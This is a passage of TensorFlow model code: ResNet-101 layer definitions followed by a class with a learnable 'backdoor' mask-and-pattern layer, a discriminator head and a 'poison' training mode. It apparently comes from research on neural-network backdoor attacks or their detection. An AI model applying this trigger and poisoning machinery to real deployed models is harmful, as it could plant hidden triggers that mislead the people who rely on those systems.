res4b5_branch2b = self.convolution(res4b5_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2b')
bn4b5_branch2b = self.batch_normalization(res4b5_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2b')
res4b5_branch2b_relu = tf.nn.relu(bn4b5_branch2b, name='res4b5_branch2b_relu')
res4b5_branch2c = self.convolution(res4b5_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b5_branch2c')
bn4b5_branch2c = self.batch_normalization(res4b5_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b5_branch2c')
res4b5 = res4b4_relu + bn4b5_branch2c
res4b5_relu = tf.nn.relu(res4b5, name='res4b5_relu')
res4b6_branch2a = self.convolution(res4b5_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2a')
bn4b6_branch2a = self.batch_normalization(res4b6_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2a')
res4b6_branch2a_relu = tf.nn.relu(bn4b6_branch2a, name='res4b6_branch2a_relu')
res4b6_branch2b_pad = tf.pad(res4b6_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b6_branch2b = self.convolution(res4b6_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2b')
bn4b6_branch2b = self.batch_normalization(res4b6_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2b')
res4b6_branch2b_relu = tf.nn.relu(bn4b6_branch2b, name='res4b6_branch2b_relu')
res4b6_branch2c = self.convolution(res4b6_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b6_branch2c')
bn4b6_branch2c = self.batch_normalization(res4b6_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b6_branch2c')
res4b6 = res4b5_relu + bn4b6_branch2c
res4b6_relu = tf.nn.relu(res4b6, name='res4b6_relu')
res4b7_branch2a = self.convolution(res4b6_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2a')
bn4b7_branch2a = self.batch_normalization(res4b7_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2a')
res4b7_branch2a_relu = tf.nn.relu(bn4b7_branch2a, name='res4b7_branch2a_relu')
res4b7_branch2b_pad = tf.pad(res4b7_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b7_branch2b = self.convolution(res4b7_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2b')
bn4b7_branch2b = self.batch_normalization(res4b7_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2b')
res4b7_branch2b_relu = tf.nn.relu(bn4b7_branch2b, name='res4b7_branch2b_relu')
res4b7_branch2c = self.convolution(res4b7_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b7_branch2c')
bn4b7_branch2c = self.batch_normalization(res4b7_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b7_branch2c')
res4b7 = res4b6_relu + bn4b7_branch2c
res4b7_relu = tf.nn.relu(res4b7, name='res4b7_relu')
res4b8_branch2a = self.convolution(res4b7_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2a')
bn4b8_branch2a = self.batch_normalization(res4b8_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2a')
res4b8_branch2a_relu = tf.nn.relu(bn4b8_branch2a, name='res4b8_branch2a_relu')
res4b8_branch2b_pad = tf.pad(res4b8_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b8_branch2b = self.convolution(res4b8_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2b')
bn4b8_branch2b = self.batch_normalization(res4b8_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2b')
res4b8_branch2b_relu = tf.nn.relu(bn4b8_branch2b, name='res4b8_branch2b_relu')
res4b8_branch2c = self.convolution(res4b8_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b8_branch2c')
bn4b8_branch2c = self.batch_normalization(res4b8_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b8_branch2c')
res4b8 = res4b7_relu + bn4b8_branch2c
res4b8_relu = tf.nn.relu(res4b8, name='res4b8_relu')
res4b9_branch2a = self.convolution(res4b8_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2a')
bn4b9_branch2a = self.batch_normalization(res4b9_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2a')
res4b9_branch2a_relu = tf.nn.relu(bn4b9_branch2a, name='res4b9_branch2a_relu')
res4b9_branch2b_pad = tf.pad(res4b9_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b9_branch2b = self.convolution(res4b9_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2b')
bn4b9_branch2b = self.batch_normalization(res4b9_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2b')
res4b9_branch2b_relu = tf.nn.relu(bn4b9_branch2b, name='res4b9_branch2b_relu')
res4b9_branch2c = self.convolution(res4b9_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b9_branch2c')
bn4b9_branch2c = self.batch_normalization(res4b9_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b9_branch2c')
res4b9 = res4b8_relu + bn4b9_branch2c
res4b9_relu = tf.nn.relu(res4b9, name='res4b9_relu')
res4b10_branch2a = self.convolution(res4b9_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2a')
bn4b10_branch2a = self.batch_normalization(res4b10_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2a')
res4b10_branch2a_relu = tf.nn.relu(bn4b10_branch2a, name='res4b10_branch2a_relu')
res4b10_branch2b_pad = tf.pad(res4b10_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b10_branch2b = self.convolution(res4b10_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2b')
bn4b10_branch2b = self.batch_normalization(res4b10_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2b')
res4b10_branch2b_relu = tf.nn.relu(bn4b10_branch2b, name='res4b10_branch2b_relu')
res4b10_branch2c = self.convolution(res4b10_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b10_branch2c')
bn4b10_branch2c = self.batch_normalization(res4b10_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b10_branch2c')
res4b10 = res4b9_relu + bn4b10_branch2c
res4b10_relu = tf.nn.relu(res4b10, name='res4b10_relu')
res4b11_branch2a = self.convolution(res4b10_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2a')
bn4b11_branch2a = self.batch_normalization(res4b11_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2a')
res4b11_branch2a_relu = tf.nn.relu(bn4b11_branch2a, name='res4b11_branch2a_relu')
res4b11_branch2b_pad = tf.pad(res4b11_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b11_branch2b = self.convolution(res4b11_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2b')
bn4b11_branch2b = self.batch_normalization(res4b11_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2b')
res4b11_branch2b_relu = tf.nn.relu(bn4b11_branch2b, name='res4b11_branch2b_relu')
res4b11_branch2c = self.convolution(res4b11_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b11_branch2c')
bn4b11_branch2c = self.batch_normalization(res4b11_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b11_branch2c')
res4b11 = res4b10_relu + bn4b11_branch2c
res4b11_relu = tf.nn.relu(res4b11, name='res4b11_relu')
res4b12_branch2a = self.convolution(res4b11_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2a')
bn4b12_branch2a = self.batch_normalization(res4b12_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2a')
res4b12_branch2a_relu = tf.nn.relu(bn4b12_branch2a, name='res4b12_branch2a_relu')
res4b12_branch2b_pad = tf.pad(res4b12_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b12_branch2b = self.convolution(res4b12_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2b')
bn4b12_branch2b = self.batch_normalization(res4b12_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2b')
res4b12_branch2b_relu = tf.nn.relu(bn4b12_branch2b, name='res4b12_branch2b_relu')
res4b12_branch2c = self.convolution(res4b12_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b12_branch2c')
bn4b12_branch2c = self.batch_normalization(res4b12_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b12_branch2c')
res4b12 = res4b11_relu + bn4b12_branch2c
res4b12_relu = tf.nn.relu(res4b12, name='res4b12_relu')
res4b13_branch2a = self.convolution(res4b12_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2a')
bn4b13_branch2a = self.batch_normalization(res4b13_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2a')
res4b13_branch2a_relu = tf.nn.relu(bn4b13_branch2a, name='res4b13_branch2a_relu')
res4b13_branch2b_pad = tf.pad(res4b13_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b13_branch2b = self.convolution(res4b13_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2b')
bn4b13_branch2b = self.batch_normalization(res4b13_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2b')
res4b13_branch2b_relu = tf.nn.relu(bn4b13_branch2b, name='res4b13_branch2b_relu')
res4b13_branch2c = self.convolution(res4b13_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b13_branch2c')
bn4b13_branch2c = self.batch_normalization(res4b13_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b13_branch2c')
res4b13 = res4b12_relu + bn4b13_branch2c
res4b13_relu = tf.nn.relu(res4b13, name='res4b13_relu')
res4b14_branch2a = self.convolution(res4b13_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2a')
bn4b14_branch2a = self.batch_normalization(res4b14_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2a')
res4b14_branch2a_relu = tf.nn.relu(bn4b14_branch2a, name='res4b14_branch2a_relu')
res4b14_branch2b_pad = tf.pad(res4b14_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b14_branch2b = self.convolution(res4b14_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2b')
bn4b14_branch2b = self.batch_normalization(res4b14_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2b')
res4b14_branch2b_relu = tf.nn.relu(bn4b14_branch2b, name='res4b14_branch2b_relu')
res4b14_branch2c = self.convolution(res4b14_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b14_branch2c')
bn4b14_branch2c = self.batch_normalization(res4b14_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b14_branch2c')
res4b14 = res4b13_relu + bn4b14_branch2c
res4b14_relu = tf.nn.relu(res4b14, name='res4b14_relu')
res4b15_branch2a = self.convolution(res4b14_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2a')
bn4b15_branch2a = self.batch_normalization(res4b15_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2a')
res4b15_branch2a_relu = tf.nn.relu(bn4b15_branch2a, name='res4b15_branch2a_relu')
res4b15_branch2b_pad = tf.pad(res4b15_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b15_branch2b = self.convolution(res4b15_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2b')
bn4b15_branch2b = self.batch_normalization(res4b15_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2b')
res4b15_branch2b_relu = tf.nn.relu(bn4b15_branch2b, name='res4b15_branch2b_relu')
res4b15_branch2c = self.convolution(res4b15_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b15_branch2c')
bn4b15_branch2c = self.batch_normalization(res4b15_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b15_branch2c')
res4b15 = res4b14_relu + bn4b15_branch2c
res4b15_relu = tf.nn.relu(res4b15, name='res4b15_relu')
res4b16_branch2a = self.convolution(res4b15_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2a')
bn4b16_branch2a = self.batch_normalization(res4b16_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2a')
res4b16_branch2a_relu = tf.nn.relu(bn4b16_branch2a, name='res4b16_branch2a_relu')
res4b16_branch2b_pad = tf.pad(res4b16_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b16_branch2b = self.convolution(res4b16_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2b')
bn4b16_branch2b = self.batch_normalization(res4b16_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2b')
res4b16_branch2b_relu = tf.nn.relu(bn4b16_branch2b, name='res4b16_branch2b_relu')
res4b16_branch2c = self.convolution(res4b16_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b16_branch2c')
bn4b16_branch2c = self.batch_normalization(res4b16_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b16_branch2c')
res4b16 = res4b15_relu + bn4b16_branch2c
res4b16_relu = tf.nn.relu(res4b16, name='res4b16_relu')
res4b17_branch2a = self.convolution(res4b16_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2a')
bn4b17_branch2a = self.batch_normalization(res4b17_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2a')
res4b17_branch2a_relu = tf.nn.relu(bn4b17_branch2a, name='res4b17_branch2a_relu')
res4b17_branch2b_pad = tf.pad(res4b17_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b17_branch2b = self.convolution(res4b17_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2b')
bn4b17_branch2b = self.batch_normalization(res4b17_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2b')
res4b17_branch2b_relu = tf.nn.relu(bn4b17_branch2b, name='res4b17_branch2b_relu')
res4b17_branch2c = self.convolution(res4b17_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b17_branch2c')
bn4b17_branch2c = self.batch_normalization(res4b17_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b17_branch2c')
res4b17 = res4b16_relu + bn4b17_branch2c
res4b17_relu = tf.nn.relu(res4b17, name='res4b17_relu')
res4b18_branch2a = self.convolution(res4b17_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2a')
bn4b18_branch2a = self.batch_normalization(res4b18_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2a')
res4b18_branch2a_relu = tf.nn.relu(bn4b18_branch2a, name='res4b18_branch2a_relu')
res4b18_branch2b_pad = tf.pad(res4b18_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b18_branch2b = self.convolution(res4b18_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2b')
bn4b18_branch2b = self.batch_normalization(res4b18_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2b')
res4b18_branch2b_relu = tf.nn.relu(bn4b18_branch2b, name='res4b18_branch2b_relu')
res4b18_branch2c = self.convolution(res4b18_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b18_branch2c')
bn4b18_branch2c = self.batch_normalization(res4b18_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b18_branch2c')
res4b18 = res4b17_relu + bn4b18_branch2c
res4b18_relu = tf.nn.relu(res4b18, name='res4b18_relu')
res4b19_branch2a = self.convolution(res4b18_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2a')
bn4b19_branch2a = self.batch_normalization(res4b19_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2a')
res4b19_branch2a_relu = tf.nn.relu(bn4b19_branch2a, name='res4b19_branch2a_relu')
res4b19_branch2b_pad = tf.pad(res4b19_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b19_branch2b = self.convolution(res4b19_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2b')
bn4b19_branch2b = self.batch_normalization(res4b19_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2b')
res4b19_branch2b_relu = tf.nn.relu(bn4b19_branch2b, name='res4b19_branch2b_relu')
res4b19_branch2c = self.convolution(res4b19_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b19_branch2c')
bn4b19_branch2c = self.batch_normalization(res4b19_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b19_branch2c')
res4b19 = res4b18_relu + bn4b19_branch2c
res4b19_relu = tf.nn.relu(res4b19, name='res4b19_relu')
res4b20_branch2a = self.convolution(res4b19_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2a')
bn4b20_branch2a = self.batch_normalization(res4b20_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2a')
res4b20_branch2a_relu = tf.nn.relu(bn4b20_branch2a, name='res4b20_branch2a_relu')
res4b20_branch2b_pad = tf.pad(res4b20_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b20_branch2b = self.convolution(res4b20_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2b')
bn4b20_branch2b = self.batch_normalization(res4b20_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2b')
res4b20_branch2b_relu = tf.nn.relu(bn4b20_branch2b, name='res4b20_branch2b_relu')
res4b20_branch2c = self.convolution(res4b20_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b20_branch2c')
bn4b20_branch2c = self.batch_normalization(res4b20_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b20_branch2c')
res4b20 = res4b19_relu + bn4b20_branch2c
res4b20_relu = tf.nn.relu(res4b20, name='res4b20_relu')
res4b21_branch2a = self.convolution(res4b20_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2a')
bn4b21_branch2a = self.batch_normalization(res4b21_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2a')
res4b21_branch2a_relu = tf.nn.relu(bn4b21_branch2a, name='res4b21_branch2a_relu')
res4b21_branch2b_pad = tf.pad(res4b21_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b21_branch2b = self.convolution(res4b21_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2b')
bn4b21_branch2b = self.batch_normalization(res4b21_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2b')
res4b21_branch2b_relu = tf.nn.relu(bn4b21_branch2b, name='res4b21_branch2b_relu')
res4b21_branch2c = self.convolution(res4b21_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b21_branch2c')
bn4b21_branch2c = self.batch_normalization(res4b21_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b21_branch2c')
res4b21 = res4b20_relu + bn4b21_branch2c
res4b21_relu = tf.nn.relu(res4b21, name='res4b21_relu')
res4b22_branch2a = self.convolution(res4b21_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2a')
bn4b22_branch2a = self.batch_normalization(res4b22_branch2a, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2a')
res4b22_branch2a_relu = tf.nn.relu(bn4b22_branch2a, name='res4b22_branch2a_relu')
res4b22_branch2b_pad = tf.pad(res4b22_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res4b22_branch2b = self.convolution(res4b22_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2b')
bn4b22_branch2b = self.batch_normalization(res4b22_branch2b, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2b')
res4b22_branch2b_relu = tf.nn.relu(bn4b22_branch2b, name='res4b22_branch2b_relu')
res4b22_branch2c = self.convolution(res4b22_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res4b22_branch2c')
bn4b22_branch2c = self.batch_normalization(res4b22_branch2c, variance_epsilon=9.99999974738e-06,
name='bn4b22_branch2c')
res4b22 = res4b21_relu + bn4b22_branch2c
res4b22_relu = tf.nn.relu(res4b22, name='res4b22_relu')
res5a_branch2a = self.convolution(res4b22_relu, group=1, strides=[2, 2], padding='VALID', name='res5a_branch2a')
res5a_branch1 = self.convolution(res4b22_relu, group=1, strides=[2, 2], padding='VALID', name='res5a_branch1')
bn5a_branch2a = self.batch_normalization(res5a_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2a')
bn5a_branch1 = self.batch_normalization(res5a_branch1, variance_epsilon=9.99999974738e-06, name='bn5a_branch1')
res5a_branch2a_relu = tf.nn.relu(bn5a_branch2a, name='res5a_branch2a_relu')
res5a_branch2b_pad = tf.pad(res5a_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5a_branch2b = self.convolution(res5a_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5a_branch2b')
bn5a_branch2b = self.batch_normalization(res5a_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2b')
res5a_branch2b_relu = tf.nn.relu(bn5a_branch2b, name='res5a_branch2b_relu')
res5a_branch2c = self.convolution(res5a_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5a_branch2c')
bn5a_branch2c = self.batch_normalization(res5a_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5a_branch2c')
res5a = bn5a_branch1 + bn5a_branch2c
res5a_relu = tf.nn.relu(res5a, name='res5a_relu')
res5b_branch2a = self.convolution(res5a_relu, group=1, strides=[1, 1], padding='VALID', name='res5b_branch2a')
bn5b_branch2a = self.batch_normalization(res5b_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2a')
res5b_branch2a_relu = tf.nn.relu(bn5b_branch2a, name='res5b_branch2a_relu')
res5b_branch2b_pad = tf.pad(res5b_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5b_branch2b = self.convolution(res5b_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5b_branch2b')
bn5b_branch2b = self.batch_normalization(res5b_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2b')
res5b_branch2b_relu = tf.nn.relu(bn5b_branch2b, name='res5b_branch2b_relu')
res5b_branch2c = self.convolution(res5b_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5b_branch2c')
bn5b_branch2c = self.batch_normalization(res5b_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5b_branch2c')
res5b = res5a_relu + bn5b_branch2c
res5b_relu = tf.nn.relu(res5b, name='res5b_relu')
res5c_branch2a = self.convolution(res5b_relu, group=1, strides=[1, 1], padding='VALID', name='res5c_branch2a')
bn5c_branch2a = self.batch_normalization(res5c_branch2a, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2a')
res5c_branch2a_relu = tf.nn.relu(bn5c_branch2a, name='res5c_branch2a_relu')
res5c_branch2b_pad = tf.pad(res5c_branch2a_relu, paddings=[[0, 0], [1, 1], [1, 1], [0, 0]])
res5c_branch2b = self.convolution(res5c_branch2b_pad, group=1, strides=[1, 1], padding='VALID',
name='res5c_branch2b')
bn5c_branch2b = self.batch_normalization(res5c_branch2b, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2b')
res5c_branch2b_relu = tf.nn.relu(bn5c_branch2b, name='res5c_branch2b_relu')
res5c_branch2c = self.convolution(res5c_branch2b_relu, group=1, strides=[1, 1], padding='VALID',
name='res5c_branch2c')
bn5c_branch2c = self.batch_normalization(res5c_branch2c, variance_epsilon=9.99999974738e-06,
name='bn5c_branch2c')
res5c = res5b_relu + bn5c_branch2c
res5c_relu = tf.nn.relu(res5c, name='res5c_relu')
feature_0 = tf.contrib.layers.flatten(res5c_relu)
with tf.variable_scope('feature') as scope:
wts = self._variable_with_constant_value('weight', self.__weights_dict['feature_1']['weights'])
bis = self._variable_with_constant_value('bias', self.__weights_dict['feature_1']['bias'])
feature_1 = tf.add(tf.matmul(feature_0, wts), bis)
cnn.top_layer = feature_1
cnn.top_size = int(bis.shape[-1])
cnn.dropout()
def _backdoor_mask(self, cnn):
with tf.variable_scope('input_mask') as scope:
in_shape = cnn.top_layer.shape
shape = np.zeros(4, dtype=np.int32)
shape[0] = 1
shape[1] = int(in_shape[1])
shape[2] = int(in_shape[2])
shape[3] = 1
mask_param = tf.get_variable('mask_param', shape, dtype=tf.float32, initializer=tf.random_normal_initializer(),
trainable=self.trainable)
mask = (tf.tanh(mask_param) + 1.) / 2.
shape[3] = int(in_shape[3])
pattern_param = tf.get_variable('pattern_param', shape, dtype=tf.float32,
initializer=tf.glorot_normal_initializer(), trainable=self.trainable)
pattern = tf.tanh(pattern_param)
masked_input = (1 - mask) * cnn.top_layer + mask * pattern
if self.options.build_level == 'mask_only':
cnn.top_layer = pattern
cnn.aux_top_layer = mask
else:
cnn.top_layer = masked_input
cnn.aux_top_layer = mask
def skip_final_affine_layer(self):
return True
def add_inference(self, cnn):
if 'backdoor' in self.options.net_mode:
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('mask' not in self.options.fix_level)
cnn.trainable = self.trainable
self._backdoor_mask(cnn)
if self.options.build_level == 'mask_only':
return cnn.top_layer
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('bottom' not in self.options.fix_level)
cnn.trainable = self.trainable
if self.model_name == 'resnet101':
self._resnet101_inference(cnn)
elif self.model_name == 'vgg16':
self._vgg16_inference(cnn)
elif self.model_name == 'googlenet':
self._googlenet_inference(cnn)
elif self.model_name == 'gtsrb':
self._gtsrb_inference(cnn)
elif self.model_name == 'cifar10':
self._resnet20.add_inference(cnn)
elif self.model_name == 'cifar10_alexnet':
self._alexnet.add_inference(cnn)
elif self.model_name == 'resnet50':
self._resnet50.add_inference(cnn)
elif self.model_name == 'benchmark_resnet101':
self._resnet101.add_inference(cnn)
cnn.affine(256, activation='linear')
if self.options.net_mode == 'triple_loss' or 'discriminator' in self.options.net_mode:
cnn.aux_top_layer = cnn.top_layer
cnn.aux_top_size = cnn.top_size
if self.options.build_level == 'logits':
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('affine' not in self.options.fix_level)
cnn.trainable = self.trainable
name = ('fc%d_1' % self.num_class)
initializers = None
if (hasattr(self, '__weights_dict')) and (name in self.__weights_dict):
print('===Debug===Hi, I found it ' + name)
initializers = []
initializers.append(tf.constant_initializer(self.__weights_dict[name]['weights']))
initializers.append(tf.constant_initializer(self.__weights_dict[name]['bias']))
cnn.affine(self.num_class, activation='linear', initializers=initializers)
self.last_affine_name = 'affine' + str(cnn.counts['affine']-1)
if 'discriminator' in self.options.net_mode:
self.trainable = cnn.phase_train and (self.options.fix_level != 'all') \
and ('discriminator' not in self.options.fix_level)
cnn.trainable = self.trainable
with tf.variable_scope('discriminator') as scope:
with cnn.switch_to_aux_top_layer():
cnn.affine(256)
cnn.affine(128)
cnn.affine(2, activation='linear')
return cnn.top_layer
def build_network(self,
inputs,
phase_train=True,
nclass=1001):
images = inputs[0]
if self.data_format == 'NCHW':
images = tf.transpose(images, [0, 3, 1, 2])
var_type = tf.float32
if self.data_type == tf.float16 and self.fp16_vars:
var_type = tf.float16
network = convnet_builder.ConvNetBuilder(
images, self.depth, phase_train, self.use_tf_layers, self.data_format,
self.data_type, var_type)
with tf.variable_scope('cg', custom_getter=network.get_custom_getter()):
self.add_inference(network)
logits = network.top_layer
aux_logits = network.aux_top_layer
# Add the final fully-connected class layer
#if not self.skip_final_affine_layer():
# logits = network.affine(nclass, activation='linear')
# aux_logits = None
# if network.aux_top_layer is not None:
# with network.switch_to_aux_top_layer():
# aux_logits = network.affine(nclass, activation='linear', stddev=0.001)
if self.data_type == tf.float16:
# TODO(reedwm): Determine if we should do this cast here.
logits = tf.cast(logits, tf.float32)
if aux_logits is not None:
aux_logits = tf.cast(aux_logits, tf.float32)
return model_lib.BuildNetworkResult(
logits=logits, extra_info=None if aux_logits is None else aux_logits)
def get_learning_rate(self, global_step, batch_size):
if self.options.data_mode == 'poison' or self.options.load_mode != 'normal':
return self.options.base_lr
if hasattr(self,'_resnet50'):
return self._resnet50.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_resnet101'):
return self._resnet101.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_resnet20'):
return self._resnet20.get_learning_rate(global_step, batch_size)
elif hasattr(self,'_alexnet'):
return self._alexnet.get_learning_rate(global_step, batch_size)
return self.options.base_lr
def batch_normalization(self, input, name, **kwargs):
with tf.variable_scope(name):
# moving_mean & moving_variance
mean = self._variable_with_constant_value('mean', self.__weights_dict[name]['mean'], False)
variance = self._variable_with_constant_value('var', self.__weights_dict[name]['var'], False)
offset = self._variable_with_constant_value('bias', self.__weights_dict[name]['bias']) \
if 'bias' in self.__weights_dict[name] else None
scale = self._variable_with_constant_value('scale', self.__weights_dict[name]['scale']) \
if 'scale' in self.__weights_dict[name] else None
if not self.trainable:
decay = 0.999
bn, batch_mean, batch_variance = tf.nn.fused_batch_norm(input, scale=scale, offset=offset,
name=name, is_training=True, epsilon=1e-5)
mean_update = moving_averages.assign_moving_average(mean, batch_mean, decay=decay, zero_debias=False)
